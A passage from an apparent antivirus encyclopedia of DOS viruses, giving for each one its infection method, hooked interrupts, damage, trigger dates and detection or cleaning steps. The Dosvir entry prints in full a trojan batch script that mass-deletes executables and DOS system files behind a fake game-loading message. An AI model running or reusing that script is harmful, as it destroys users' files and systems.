  8868. The method of infection is: Move first 656 bytes of original file
  8869. to the end, then write virus code into first 656 bytes. Then
  8870. attach "SVC" to the end of it.
  8871.  
  8872. Damage: Infected programs could not be executed
  8873.  
  8874. Note:
  8875. 1) Date and time of infected files does not change.
  8876. 2) When virus executed, it will check :
  8877.    (1)Whether it is being traced by Debug. If it is, halt system.
  8878.    (2)whether there are some scanning virus software like
  8879.       F-LOCK, F-POPUP, F-FCHK, F-DLOCK, ThunderByte, TBSCANX. If
  8880.       any of these software is found, stop executing.
  8881.  
  8882. Detecting Method:
  8883. 1) There is a text at the back of infected files, the text has
  8884.    listed above.
  8885. 2) There is a message at the end of infected files, the message
  8886.    is "SVC".
  8887. 3) Infected files will increase by 656 bytes.
  8888.  
  8889. Cleaning Method: First, omit first 656 bytes from infected files,
  8890. then omit "SVC" from the end of it. If length of current file is
  8891. larger than 656 bytes, move latest 656 byte to the beginning.
  8892.  
  8893. [V500]
  8894. Virus Name: V500
  8895. Virus Type: Memory Resident(OS), COM File infector
  8896. Virus Length:  500 bytes
  8897.  
  8898. Executing Procedure: Virus checks whether the DOS Version is 3.3.
  8899. If not, goes back to original routine directly. Otherwise, it
  8900. will stay resident in memory (OS area). Then, when the interrupt
  8901. among INT 00h to INT 0CH is called, the system will call INT 86h
  8902. automatically to infect COM files executed (Length must be
  8903. between 200h bytes and F600h) and goes back to the original
  8904. routine. A file can be infected many times.
  8905.  
  8906. The method of infection is: First, moves the first 500 bytes of
  8907. the original file to the end, then writes virus codes into the first 500
  8908. bytes of the file.
  8909.  
  8910. Vectors hooked: Hook INT 21H(AH=4Bh) to infect files. It will
  8911. check whether the program to be executed is an COM file. If it
  8912. is, the virus proceeds to infect it.
  8913.  
  8914. Damage: None
  8915.  
  8916. Note: Date and time of infected files do not change.
  8917.  
  8918. Detecting Method: Infected file sizes increase by 500 bytes.
  8919.  
  8920. [Crazy-L15]
  8921. Virus Name: Crazy-I15
  8922. Virus Type: Memory Resident(HiMem), COM File infector
  8923. Virus Length: 1,402 bytes
  8924.  
  8925. Executing Procedure: Checks whether it resides in memory. If not,
  8926. it will stay resident in high memory. Then hooks INT 21h and goes
  8927. back to the original routine.
  8928.  
  8929. Vectors hooked: Hooks INT 21H(AH=4Bh) to infect files. First, it
  8930. will hang INT 24h to prevent divulging its trace when writing,
  8931. then checks whether the program to be executed is an uninfected
  8932. COM file. If it is, virus proceeds to infect it. Finally, restores
  8933. INT 24h.
  8934.  
  8935. Damage: None
  8936.  
  8937. Detecting Method: Infected file sizes increase by 1402 bytes.
  8938.  
  8939. [Variety]
  8940. Virus Name: Variety
  8941. Virus Type: COM File infector
  8942. Virus Length:  625 bytes
  8943.  
  8944. Executing Procedure: The virus decodes first. Then infects a COM
  8945. file on current directory (It only infects one  file at a time).
  8946. The method of infection is: First, it will encode virus code,
  8947. then attaches it to the end of original file.
  8948.  
  8949. Damage: None
  8950.  
  8951. Note:
  8952. 1) If DOS Version is not above 2.0, it will not infect any files.
  8953. 2) Time and date of infected files do not change.
  8954.  
  8955. Detecting Method: Infected file sizes increase by 625 bytes.
  8956.  
  8957. [Infector]
  8958. Virus Name: Infector
  8959. Virus Type: COM File infector
  8960. Virus Length:  820-830 bytes
  8961.  
  8962. Executing Procedure:
  8963. Searches for an uninfected COM file on the current directory, and
  8964. proceeds to infect it (It only infects one file at a time.)
  8965.  
  8966. Damage: None
  8967.  
  8968. Note:
  8969. 1) Most infected files cannot be executed due to the poor quality
  8970.    of the virus procedure.
  8971. 2) Does not stay in memory.
  8972. 3) You will see an error message when writing because INT 24h has
  8973.    not been hanged.
  8974.  
  8975. Detecting Method: Infected file sizes increase by 820 to 830
  8976. bytes.
  8977.  
  8978. [Irish-3]
  8979. Virus Name: Irish-3
  8980. Virus Type: COM File infector
  8981. Virus Length:  1164 bytes
  8982.  
  8983. Executing Procedure: Checks whether it is residing in memory. If
  8984. not, it will stay resident in   high memory. Then hooks INT 21h,
  8985. INT 1Ch and goes back to the original routine.
  8986.  
  8987. Vectors hooked: Hooks INT 21H(AH=4Bh) to infect files. It will
  8988. check whether the program to be executed is an uninfected COM
  8989. file. If it is, the virus proceeds to infect it. If it is an
  8990. uninfected EXE file, then virus creates a new COM file (with
  8991. length between 2000 and 4000 bytes) with the same file name as
  8992. original EXE file. This new COM file is the virus.
  8993.  
  8994. Damage: None
  8995.  
  8996. Note:
  8997. 1) If current date is November 21, it will count time by hook INT
  8998.    08h. After a few minutes. It will display the following
  8999.    message:
  9000.  
  9001.    "Virus V2.0 (c) 1991 Necros The Hacher Written on 29,30
  9002.    June.................................. ...................."
  9003.  
  9004. 2) You will see an error message when writing because INT 24h has
  9005.    not been hanged.
  9006.  
  9007. Detecting Method: Infected file sizes increase by 1164 bytes.
  9008.  
  9009. [SILENT_LAMB]
  9010. Virus Name: SILENT_LAMB
  9011. Alias Name: The Silence Of The Lamb!
  9012. Virus Type: Memory resident, COM File infector
  9013. Virus Length:  555 bytes
  9014.  
  9015. Executing Procedure: Checks whether it is resident in the last
  9016. memory block.  If not, it will stay resident in high memory and
  9017. returns to original routine. The method of infection is: First,
  9018. encodes first 200h bytes of original file and attaches them and
  9019. decoded codes to the end of the file. Then encodes virus code and
  9020. writes them into first 200h bytes of the file.
  9021.  
  9022. Vectors hooked: Hooks INT 21H(AH=4Bh) to infect files. Firsts, it
  9023. will hang INT 24h to prevent divulging its trace when writing,
  9024. then checks whether the program to be executed is an uninfected
  9025. COM file (Length is between 0400h and FA00h bytes). If it is,
  9026. infect it. Finally, virus restores INT 24h. Damage: None
  9027.  
  9028. Note:  Date and time of infected files do not change.
  9029.  
  9030. Detecting Method:
  9031. 1) Call INT21h (AH=2Dh,CH=FFh,DH=FFh) to return value AH. If
  9032.    AH=00h, memory has been infected. If AH=FFh, memory has not
  9033.    been infected.
  9034. 2) If word at address 0002 of COM file is 5944h, memory has been
  9035.    infected. After virus code have decoded, there is a text in
  9036.    address from 01E6h to 01EFh. The text is
  9037.  
  9038.    "The Silence Of The Lamb!$".
  9039.  
  9040. 3) Total memory decreases by 1568 bytes.
  9041.  
  9042. [Gorlovka]
  9043. Virus Name: Gorlovka
  9044. Virus Type: Memory resident, COM & EXE File infector
  9045. Virus Length:
  9046.  
  9047. Executing Procedure: Checks whether it resides in memory. If it
  9048. is, virus displays the following message: "Tracing mode has been
  9049. destroyed." Otherwise, it will stay resident in high memory. Then
  9050. hooks INT 21h and then displays: "Tracing mode has been
  9051. destroyed."
  9052.  
  9053. Vectors hooked: Hooks INT 21H(AH=4Bh). First, it will hang INT
  9054. 24h to prevent divulging its trace when writing, then checks
  9055. whether the program to be executed is an uninfected COM or EXE
  9056. file. If it is, virus proceeds to infect it.    Finally, virus
  9057. restores INT 24h.
  9058.  
  9059. Damage: It will overwrite original files with virus code.
  9060. Original files are destroyed.
  9061.  
  9062. Note: Infected file lengths do not change
  9063.  
  9064. Detecting Method: When an infected file is executed, it will
  9065. display the above message.
  9066.  
  9067. [Akuku-649]
  9068. Virus Name: Akuku-649
  9069. Virus Type: COM File infector
  9070. Virus Length:  649 bytes
  9071.  
  9072. Executing Procedure: Searches for all uninfected COM file on
  9073. current directory (It does not infect same file twice) and then
  9074. proceeds to infect  them. No matter whether it has infected files
  9075. or not, it will check to see whether current calendar year is
  9076. greater then 1994, that the current month is greater than 6, that
  9077. the current day is greater than 6, and that current time is after
  9078. 15:00. If all these conditions are met, virus displays the
  9079. following message:
  9080.  
  9081.     "A kuku frajerze."
  9082.  
  9083. Damage: None
  9084.  
  9085. Note:
  9086. 1) Does not stay in memory.
  9087. 2) Before infecting files, it will hang INT 24h to prevent
  9088.    divulging its trace when writing.
  9089.  
  9090. Detecting Method: Infected file sizes increase by 649 bytes.
  9091.  
  9092. [Cossiga]
  9093. Virus Name: Cossiga
  9094. Virus Type: EXE File infector
  9095. Virus Length:
  9096.  
  9097. Executing Procedure: Searches for an uninfected EXE file on
  9098. current directory, and then infects it (It only infects one file
  9099. at a time). No matter whether it has infected files or not, it
  9100. will check whether current date is after 10/17/1991. If it is,
  9101. virus displays following message:
  9102.  
  9103.     "COSSIGA ?! NO GRAZZIE ! By Amissi dee Panoce (c) 1991 "
  9104.  
  9105. Damage: It will overwrite original files with virus code.
  9106. Original files are destroyed.
  9107.  
  9108. Note:
  9109. 1) Does not stay in memory.
  9110. 2) You will see an error message when writing because INT 24h has
  9111.    not been hanged.
  9112.  
  9113. [DOS Vir]
  9114. Virus Name: Dosvir
  9115. Virus Type: TROJAN
  9116. Virus Length:  3004 bytes
  9117.  
  9118. Executing Procedure: Virus creates a batch file, and then
  9119. executes this batch file. Therefore, this virus is just like a
  9120. batch file Content of batch file is as follows:
  9121.  
  9122.         CLS
  9123.         echo Cracked by Cracking Kr .e 20 2
  9124.         echo Loading game.  .Please Wait....
  9125.         c:
  9126.         CD\
  9127.         DEL autoexec.bat
  9128.         DEL *.exe
  9129.         DEL *.com
  9130.         DEL *.exe
  9131.         DEL *.com
  9132.         DEL *.sys
  9133.         ATTRIB..-r ibmbio.com
  9134.         ATTRIB..-r ibmdos.com
  9135.         ATTRIB..-r ibmbio.sys
  9136.         ATTRIB..-r ibmdos.sys
  9137.         DEL ibmbio.com
  9138.         DEL ibmdos.com
  9139.         DEL ibmbio.sys
  9140.         DEL ibmdos.sys
  9141.         CD\bbs
  9142.         DEL *.exe
  9143.         DEL *.com
  9144.         CD\dos
  9145.         DEL *.exe
  9146.         DEL *.com
  9147.         d:
  9148.         CD\
  9149.         DEL autoexec.bat
  9150.         DEL *.exe
  9151.         DEL *.com
  9152.         CD\dos
  9153.         DEL *.exe
  9154.         DEL *.com
  9155.         CD\bbs
  9156.         DEL *.exe
  9157.         DEL *.com
  9158.         CLS
  9159.  
  9160. [Deranged]
  9161. Virus Name: Deranged
  9162. Virus Type: EXE File infector
  9163. Virus Length: 419 bytes
  9164.  
  9165. Executing Procedure: Searches for all uninfected EXE files on
  9166. current directory, and then proceeds to infect them.
  9167.  
  9168. Damage: None
  9169.  
  9170. Note:
  9171. 1) Because the virus procedure is not well written, system halts
  9172.    when an infected file is executed.
  9173. 2) Does not stay in memory.
  9174. 3) You will see an error message when writing because INT 24h has
  9175.    not been hanged.
  9176.  
  9177. Detecting Method: Infected file sizes increase by 419 bytes.
  9178.  
  9179. [James]
  9180. Virus Name: James
  9181. Virus Type: COM File infector
  9182. Virus Length: 356 bytes
  9183.  
  9184. Executing Procedure: Checks whether it remains resident in
  9185. memory. If not, it will stay resident in high memory. Then hooks
  9186. INT 21h and goes back to original routine.
  9187.  
  9188. Vectors hooked: Hooks INT 21H(AH=4Bh) to infect files. First, it
  9189. will hang INT 24h to prevent divulging its trace when writing,
  9190. then checks whether the program to be executed is an uninfected
  9191. COM file. If it is, virus proceeds to infect it. Finally, virus
  9192. restores INT 24h.
  9193.  
  9194. Damage: None
  9195.  
  9196. Detecting Method: Infected file sizes increase by 356 bytes.
  9197.  
  9198. [Abraxas-3]
  9199. Virus Name: Abraxas-3
  9200. Virus Type: EXE File infector
  9201. Virus Length: 1200 bytes
  9202.  
  9203. Executing Procedure:
  9204. First, virus issues the song "Do Re Mi Fa So La Si Do Re......".
  9205. Then displays the message:
  9206.  
  9207.     "abraxas"
  9208.  
  9209. in enlarged font. Then, searches for an uninfected EXE file on
  9210. current directory and proceeds to infect it (It only infects one
  9211. file at a time). The method of infection is: Creates a file with
  9212. the same name as the original file, and its length is 1200 bytes.
  9213.  
  9214. Damage: It will overwrite original files with virus code.
  9215. Original files are destroyed.
  9216.  
  9217. Detecting Method: Infected file length is 1200 bytes.
  9218.  
  9219. [Wolfman]
  9220. Virus Name: Wolf-Man
  9221. Virus Type: Memory Resident, COM & EXE File
  9222.             infector
  9223. Virus Length: 2064 bytes
  9224.  
  9225. Executing Procedure: Checks whether it remains resident in
  9226. memory. If not, it will stay resident in memory. Then checks
  9227. whether current calendar day is 15. If it is, virus will manifest
  9228. itself. Otherwise, hooks INT 09H, INT 10H, INT 16H, INT 21H and
  9229. goes back to the original routine.
  9230.  
  9231. Vectors hooked: Hooks INT 21H to infect files. It will check
  9232. whether the program to be executed is an infectable file (Except
  9233. COMMAND.COM), and then proceeds to infect it (The infectable file
  9234. length must be larger than 1400 bytes). Hooks INT 9h, INT 10h to
  9235. check whether something in program has changed. If it has, virus
  9236. will manifest itself.
  9237.  
  9238. Symptoms: Displays a message.  Overwrites current diskette with
  9239. virus code until there is no more free space. Delays 30 seconds
  9240. and proceeds to reboot system.
  9241.  
  9242. Damage: Destroys all data on current diskette.
  9243.  
  9244. Note:
  9245. 1) Procedure for displaying the virus message is designed for
  9246.    Herc display card.  Therefore, system halts if is run on a
  9247.    color display card. This, in turn, can prevent destruction of
  9248.    the hard disk.
  9249. 2) Virus procedure contains WOLFMAN" text.
  9250.  
  9251. Detecting Method:
  9252. 1) Infected file sizes increase by 143 bytes.
  9253. 2) Checks whether an executed program remains resident in memory
  9254.    (it will occupy approx. 65.6K bytes) by using MEM.EXE program.
  9255.  
  9256. [Cuban]
  9257. Virus Name: Cuban
  9258. Virus Type: COM File infector
  9259. Virus Length: 1501 bytes
  9260.  
  9261. Executing Procedure: Checks whether it has remained resident in
  9262. memory. If not, it will stay resident in high memory. Then hooks
  9263. INT 21h and goes back to original routine. This virus will check
  9264. whether current calendar day is 30. If it is,   virus proceeds to
  9265. destroy all data on hard diskette.
  9266.  
  9267. Vectors hooked: Hooks INT 21H(AH=4Bh)to infect files. First, it
  9268. will hang INT 24h to prevent divulging its trace when writing. If
  9269. the program to be executed is an uninfected COM file, virus
  9270. infects it directly. If the program to be  executed is an EXE
  9271. file, it will search for an unfixed COM file and infect this COM
  9272. file. Finally, virus restores INT 24h.
  9273.  
  9274. Damage: Virus will sometimes destroy all data on hard diskette.
  9275.  
  9276. Detecting Method: Infected file sizes increase by 1501 bytes.
  9277.  
  9278. [Darkend]
  9279. Virus Name: Darkend
  9280. Virus Type: EXE File infector
  9281. Virus Length: 1188 bytes
  9282.  
  9283. Executing Procedure: Checks whether it has remained resident in
  9284. memory. If not, it will stay resident in high memory. Then hooks
  9285. INT 21h and goes back to original routine. This virus will check
  9286. whether current date is October 15. If it is,   virus destroys
  9287. all data on hard diskette.
  9288.  
  9289. Vectors hooked: Hooks INT 21H(AH=4Bh) to infect files. If the
  9290. program to be executed is an uninfected EXE file, virus proceeds
  9291. to infect it directly.
  9292.  
  9293. Damage:  Virus will sometimes destroy all data on hard diskette.
  9294.  
  9295. Detecting Method: Infected file sizes increase by 1188 bytes.
  9296.  
  9297. [Story-A]
  9298. Virus Name: Story-A
  9299. Virus Type: COM File infector
  9300. Virus Length: 1117 bytes
  9301.  
  9302. Executing Procedure: Searches from root directory and all
  9303. subdirectory to find 3 uninfected COM   (Except COMMAND.COM)
  9304. files, and then infects them (It does not infect same file
  9305. twice). Then holds the order of every infected file. Then checks
  9306. if the order of current infected file is larger than 7, or if
  9307. current date is July 9. If either of these two conditions are
  9308. met, virus   will be triggered.
  9309.  
  9310. Vectors hooked: Hooks INT 08H to accumulate system time.
  9311.  
  9312. Symptoms: Does not execute infection procedure, stays resident in
  9313. memory. Then hooks INT 08h. 290 seconds later, a message displays
  9314. in inverse mode repeatedly in 22-second cycles.
  9315.  
  9316. Note: Date and time of infected files do not change.
  9317.  
  9318. Detecting Method:
  9319. 1) Memory:
  9320.    a) Total system memory  decreases.
  9321.    b) Virus might be triggered if first 4 bytes of segment
  9322.       (Before free memory) are FFh,26h, 04h,01h.
  9323. 2) File:
  9324.    a) Infected file sizes increase by 1117 bytes.
  9325.    b) First 4 bytes of infection are FFh,26h,04h, 01h.
  9326.  
  9327. [Story-B]
  9328. Virus Name: Story-B
  9329. Virus Type: COM File infector
  9330. Virus Length: 1168 bytes
  9331.  
  9332. Executing Procedure: Searches from root directory and all
  9333. subdirectory to find 3 uninfected COM (Except COMMAND.COM) files,
  9334. and then infects them (It does not infect same file twice). Then
  9335. holds the order of infected files. Then checks if the order of
  9336. current infected file is larger than 7, or whether current month
  9337. is December. If either of these two conditions are met, the virus
  9338. will be triggered.
  9339.  
  9340. Vectors hooked: Hooks INT 08H to accumulate system time.
  9341.  
  9342. Symptoms: Does not execute infection procedure, stays resident in
  9343. memory. Then hooks INT 08h. 290 seconds later, a message
  9344. displays in inverse mode repeatedly in 22-second cycles.
  9345.  
  9346. Note: Date and time of infected files do not change.
  9347.  
  9348. Detecting Method:
  9349. 1) Memory:
  9350.    a) Total system memory decreases.
  9351.    b) Virus might be triggered if first 4 bytes of segment
  9352.       (Before free memory) are FFh,26h, 04h,01h.
  9353. 2) File:
  9354.    a) Infected file sizes increase by 1168 bytes.
  9355.    b) First 4 bytes of infection are FFh,26h,04h, 01h.
  9356.  
  9357. [MS DOS 3.0]
  9358. Virus Name: Ms-Dos3.0
  9359. Virus Type: COM File infector
  9360. Virus Length:  953 bytes
  9361.  
  9362. Executing Procedure: Checks whether it has remained resident in
  9363. memory. If not, it will stay resident in high memory. Then hooks
  9364. INT 21h and returns to  the original routine.
  9365.  
  9366. Vectors hooked: Hooks INT 21H (AH=3Dh,AX=4B00h) to infect files.
  9367. If the program to be executed or opened is an uninfected COM file
  9368. (Except COMMAND.COM) and its length is not larger than FB00h,
  9369. virus proceeds to infect it. The method   of infection is: writes
  9370. a total of 35Dh bytes (1Ch bytes are its head, first 3B9h bytes
  9371. of file) to the end of file, then overwrites its first 3B9h bytes
  9372. with virus codes. If the program to be executed or opened is an
  9373. uninfected EXE file and its length is not larger than 4000h,
  9374. virus infects it. The method of infection is: after filling the
  9375. left bytes of segment, it will attach a total of 3F1h bytes
  9376. (virus codes(3B9h)+data in original file(1Ch)+head offile(1Ch))
  9377. to the end of file, then changes the pointer in head to virus
  9378. procedure.
  9379.  
  9380. Damage: None
  9381.  
  9382. Note:
  9383. 1) Date and time of infected files do not change.
  9384. 2) Stealth type virus: restores infected file information when
  9385.    virus is in system memory.
  9386.  
  9387. Detecting Method:
  9388. 1) Memory:
  9389.    a) Total system memory decreases by 7A0h bytes.
  9390.    b) Memory might be infected if AX=9051h (AX is a return value
  9391.       when INT 21h(AH=B3h) called).
  9392. 2) File:
  9393.    a) Infected COM file sizes increase by 500 bytes.
  9394.    b) Infected EXE file sizes increase by 1009-1024 bytes.
  9395.    c) Use DEBUG to load an infected file.
  9396.  
  9397. [Evilgen]
  9398. Virus Name: Evilgen
  9399. Virus Type: COM & EXE File infector
  9400. Virus Length:  955 bytes(Version 1.1) , 963 bytes(Version 2.0)
  9401.  
  9402. Executing Procedure: Checks whether it has remained resident in
  9403. memory. If not, it will stay resident in high memory. Then hooks
  9404. INT 21h, INT 09h and goes back to the original routine. It will
  9405. check if current day is 24 and   if the 'Del' key is being pushed
  9406. down. If so, virus will be triggered.
  9407.  
  9408. Vectors hooked: Hooks INT 21H(AX=4B00h) to infect files. If the
  9409. program to be executed is an uninfected EXE or COM file, virus
  9410. proceeds to infect it. Hooks INT 09h to check whether the 'Del'
  9411. key is being pushing down.
  9412.  
  9413. Symptom: Selects a sector, then formats the sector from head
  9414. 0,track 0 to head 0, track 20h on C diskette.
  9415.  
  9416. Damage: Virus will sometimes destroy C diskette.
  9417.  
  9418. Note:
  9419. 1) Date and time of infected files do not change.
  9420. 2) While memory has been infected, typing  Dir" does not reveal
  9421.    changes in file length.
  9422.  
  9423. Detecting Method:
  9424. 1) Memory:
  9425.    a) Total system memory decreases.
  9426.    b) COMMAND.COM on root directory on C diskette has been
  9427.       infected if BX=9051h(BX is a return value when INT
  9428.       21h(AX=7BCDh) called).
  9429.    c) The pointers of INT 21h and INT 09h are the same.
  9430.  
  9431. 2) File:
  9432.    Infected file sizes increase by 955 bytes (Version 1.1) or 963
  9433.    bytes (Version 2.0.) Changes in file sizes are apparent only
  9434.    when memory has not been infected.
  9435.  
  9436. [Decide-2]
  9437. Virus Name: Decide-2
  9438. Virus Type: COM File infector
  9439. Virus Length:  1335 bytes
  9440.  
  9441. Executing Procedure: Searches for an uninfected COM file on
  9442. current directory, and then infects it (It only infects each file
  9443. once). No matter whether it has infected a file or not, it will
  9444. check whether current calendar month is September or October, and
  9445. current day is between 3 and 18. If it is, virus displays the
  9446. following:
  9447.  
  9448.     "As the good times of DECIDE will be remembered, I started to
  9449.     make a new virus. You are not facing the dark tombs of
  9450.     "Morgoth". Humble regards to : Pazuzu, Kingu, Absu Mummu
  9451.     Tiamat, Baxaxaxa Baxaxaxa, Yog Sothoth Iak Sakkath, Kutulu,
  9452.     Humwawa Xaztur, Hubbur Shub Niggurath. Also my lovely regards
  9453.     go to Stephanie, the only one who makes my heart beat
  9454.     stronger. Want to make love with a Moribid Angel? Glenn
  9455.     greets ya. Press a key to start the program...
  9456.  
  9457. Damage: None
  9458.  
  9459. Note:
  9460. 1) Does not remain in memory.
  9461. 2) You will see an error message when writing because INT 24h has
  9462.    not been hanged.
  9463.  
  9464. Detecting Method: Infected file sizes increase by 1335 bytes.
  9465.  
  9466. [ED]
  9467. Virus Name: Ed
  9468. Virus Type: COM & EXE File infector
  9469. Virus Length: 775-785 bytes
  9470.  
  9471. Executing Procedure: Checks whether it has remained resident in
  9472. memory. If not, it will stay resident in high memory. Then hooks
  9473. INT 21h and goes back to original routine.
  9474.  
  9475. Vectors hooked: Hooks INT 21H(AH=4Bh)to infect files. First, it
  9476. will hang INT 24h to prevent divulging its trace when writing. If
  9477. the program to be executed is an uninfected COM or EXE file,
  9478. virus proceeds to infect it.
  9479.  
  9480. Damage: There is a flag in virus procedure (Every infected file
  9481. has a different flag). The flag decreases by 1 every time virus
  9482. infects a new file. When the flag is equal to zero, it will
  9483. destroy all data on hard diskette.
  9484.  
  9485. Detecting Method: Infected file sizes increase by 775-785 bytes.
  9486.  
  9487. [Dima]
  9488. Virus Name: Dima
  9489. Virus Type: COM & EXE File infector
  9490. Virus Length: 1024 bytes
  9491.  
  9492. Executing Procedure: Searches for all uninfected COM & EXE files
  9493. on all directories, and infects them.
  9494.  
  9495. Vectors hooked: Hooks INT 24H to prevent divulging its trace when
  9496. writing.
  9497.  
  9498. Detecting Method: Infected file sizes increase by 1024 bytes.
  9499.  
  9500. [Digger]
  9501. Virus Name: Digger
  9502. Virus Type: COM & EXE File infector
  9503. Virus Length:  1472-1482 bytes
  9504.  
  9505. Executing Procedure:
  9506. Searches for an uninfected COM or EXE file on current directory,
  9507. and then infects it (It only infects each file once).
  9508.  
  9509. Damage: None
  9510.  
  9511. Note:
  9512. 1) Does not stay in memory.
  9513. 2) You will see an error message when writing because INT 24h has
  9514.    not been hanged.
  9515.  
  9516. Detecting Method: Infected file sizes increase by 1472-1482
  9517. bytes.
  9518.  
  9519. [FVHS]
  9520. Virus Name: Fvhs
  9521. Virus Type: COM & EXE File infector
  9522. Virus Length:
  9523.  
  9524. Executing Procedure: Searches for an uninfected COM or EXE file
  9525. on current and parent directories, then infects them. It can
  9526. infect three files at a time.
  9527.  
  9528. Damage: It will overwrite original files by virus code. Original
  9529. files are destroyed.
  9530.  
  9531. Note:
  9532. 1) Does not stay in memory.
  9533. 2) You will see an error message when writing because INT 24h has
  9534.    not been hanged
  9535.  
  9536. [Egg]
  9537. Virus Name: Egg
  9538. Virus Type: EXE File infector
  9539. Virus Length:  1000-1005 bytes
  9540.  
  9541. Executing Procedure: Checks whether it has remained resident in
  9542. memory. If not, it will stay resident in high memory. Then hooks
  9543. INT 21h and goes back to original routine.
  9544.  
  9545. Vectors hooked: Hooks INT 21H(AH=4Bh) to infect files. First, it
  9546. will hang INT 24h to prevent divulging its trace when writing. If
  9547. the program to be executed is an uninfected EXE file, virus
  9548. proceeds to infect it.
  9549.  
  9550. Damage: None
  9551.  
  9552. Detecting Method: Infected file sizes increase by 1000-1005
  9553. bytes.
  9554.  
  9555. [Freddy]
  9556. Virus Name: Freddy
  9557. Virus Type: EXE & COM File infector
  9558. Virus Length:  1870-1880 bytes
  9559.  
  9560. Executing Procedure: Checks whether it has remained resident in
  9561. memory. If not, it will stay resident in high memory. Then hooks
  9562. INT 21h and goes back to original routine.
  9563.  
  9564. Vectors hooked: Hooks INT 21H(AH=4Bh)to infect files. If the
  9565. program to be executed is an uninfected COM or EXE file, virus
  9566. proceeds to infect it.  Virus sometimes searches concurrently for
  9567. other uninfected files to infect.
  9568.  
  9569. Damage: None
  9570.  
  9571. Note: You will see an error message when writing because INT 24h
  9572. has not been hanged.
  9573.  
  9574. Detecting Method: Infected file sizes increase by 1870-1880
  9575. bytes.
  9576.  
  9577. [Ninja]
  9578. Virus Name: Ninja
  9579. Virus Type: EXE & COM File infector
  9580. Virus Length:  1511 or 1466 bytes
  9581.  
  9582. Executing Procedure: Checks whether it has remained resident in
  9583. memory. If not, it will stay resident in high memory. Then hooks
  9584. INT 21h and goes back to original routine. It will check whether
  9585. current calendar year is 1992, current day is 13, and current
  9586. time is 13:00. If these conditions met, virus proceeds to destroy
  9587. all data on hard disk.
  9588.  
  9589. Vectors hooked: Hooks INT 21H(AH=4Bh)to infect files. If the
  9590. program to be executed is an uninfected EXE or COM file, virus
  9591. infects it.
  9592.  
  9593. Damage: All data on hard diskette will sometimes be destroyed.
  9594.  
  9595. Detecting Method: Infected file sizes increase by 1511 or 1466
  9596. bytes.
  9597.  
  9598. [Yan-2505A]
  9599. Virus Name: Yan2505a
  9600. Virus Type: EXE & COM File infector
  9601. Virus Length:  2505 bytes
  9602.  
  9603. Executing Procedure: Checks whether it has remained resident in
  9604. memory. If not, it will stay resident in high memory. Then hooks
  9605. INT 21h and returns to  original routine.
  9606.  
  9607. Vectors hooked: Hooks INT 21H(AH=4Bh)to infect files. First, it
  9608. will hang INT 24h to prevent divulging its trace when writing. If
  9609. the program to be executed is an uninfected COM or EXE file,
  9610. virus proceeds to infect it.
  9611.  
  9612. Damage: None
  9613.  
  9614. Detecting Method: Infected file sizes increase by 2505 bytes.
  9615.  
  9616. [Suicide]
  9617. Virus Name: Suicide
  9618. Virus Type: COM & EXE File infector
  9619. Virus Length:  2048 bytes
  9620.  
  9621. Executing Procedure: Searches for uninfected COM or EXE files on
  9622. current directory, then infects them. It can infect four files
  9623. at a time.
  9624.  
  9625. Damage: None
  9626.  
  9627. Note:
  9628. 1) Does not stay in memory.
  9629. 2) You will see an error message when writing because INT 24h has
  9630.    not been hanged.
  9631.  
  9632. Detecting Method: Infected file sizes increase by 2048 bytes.
  9633.  
  9634. [4915]
  9635. Virus Name: 4915
  9636. Virus Type: EXE File infector
  9637. Virus Length:
  9638.  
  9639. Executing Procedure: Searches for all uninfected EXE files on
  9640. current directory from diskette A, then proceeds to infect them.
  9641.  
  9642. Damage: It will overwrite original files with a virus code.
  9643. Original files are destroyed.
  9644.  
  9645. Note:
  9646. 1) Does not stay in memory.
  9647. 2) You will see an error message when writing because INT 24h has
  9648.    not been hanged.
  9649. 3) This virus is written with an advanced language.
  9650.  
  9651. [MSJ]
  9652. Virus Name: Msj
  9653. Virus Type: EXE & COM File infector
  9654. Virus Length: 15395 bytes
  9655.  
  9656. Executing Procedure: Searches for an uninfected EXE file on
  9657. current directory from diskette A, B or C, then proceeds to
  9658. infect it. It only infects one file at a time.
  9659.  
  9660. Damage: None
  9661.  
  9662. Note:
  9663. 1) Does not stay in memory.
  9664. 2) You will see an error message when writing because INT 24h has
  9665.    not been hanged.
  9666. 3) This virus is written with an advanced language.
  9667.  
  9668. Detecting Method: Infected file sizes increase by 15395 bytes.
  9669.  
  9670. [Pa-5220]
  9671. Virus Name: Pa-5220
  9672. Virus Type: EXE & COM File infector
  9673. Virus Length:
  9674.  
  9675. Executing Procedure: Virus searches for an uninfected COM or EXE
  9676. file on current directory from diskette A, B or C, then infects
  9677. it. It only infects one file at a time.
  9678.  
  9679. Damage: It will overwrite original files with a virus code.
  9680. Original files are destroyed.
  9681.  
  9682. Note:
  9683. 1) Does not stay in memory.
  9684. 2) You will see an error message when writing because INT 24h has
  9685.    not been hanged.
  9686. 3) This virus is written with an advanced language.
  9687.  
  9688. [PCBB-11]
  9689. Virus Name: Pcbb11
  9690. Virus Type: EXE & COM File infector
  9691. Virus Length:  3052 bytes
  9692.  
  9693. Executing Procedure: Checks whether it has remained resident in
  9694. memory. If not, it will stay resident in high memory. Then hooks
  9695. INT 21h and goes back to original routine.
  9696.  
  9697. Vectors hooked: Hooks INT 21H(AH=4Bh)to infect files. First, it
  9698. will hang INT 24h to prevent divulging its trace when writing. If
  9699. the program to be executed is an uninfected COM or EXE file,
  9700. virus proceeds to infect it.
  9701.  
  9702. Damage: ?
  9703.  
  9704. Detecting Method: Infected file sizes increase by 3052 bytes.
  9705.  
  9706. [Bow]
  9707. Virus Name: Bow
  9708. Virus Type: EXE & COM File infector
  9709. Virus Length:  5856 bytes
  9710.  
  9711. Executing Procedure: Checks whether it has remained resident in
  9712. memory. If not, it will stay resident in high memory. Then hooks
  9713. INT 21h and goes back to original routine.
  9714.  
  9715. Vectors hooked: Hooks INT 21H(AH=4Bh) to infect files. If the
  9716. program to be executed is an uninfected COM or EXE file, virus
  9717. proceeds to infect it.
  9718.  
  9719. Damage: None
  9720.  
  9721. Note:
  9722. 1) You will see an error message when writing because INT 24h has
  9723.    not been hanged.
  9724. 2) This virus is written with an advanced language.
  9725.  
  9726. Detecting Method: Infected file sizes increase by 5856 bytes.
  9727.  
  9728. [PCBB-3072]
  9729. Virus Name: Pcbb3072
  9730. Virus Type: EXE & COM File infector
  9731. Virus Length: 3,072 bytes
  9732.  
  9733. Executing Procedure: Checks whether it has remained resident in
  9734. memory. If not, it will stay resident in high memory. Then hooks
  9735. INT 21h and goes back to original routine.
  9736.  
  9737. Vectors hooked: Hooks INT 21H(AH=4Bh)to infect files. First, it
  9738. will hang INT 24h to prevent divulging its trace when writing. If
  9739. the program to be executed is an uninfected COM or EXE file,
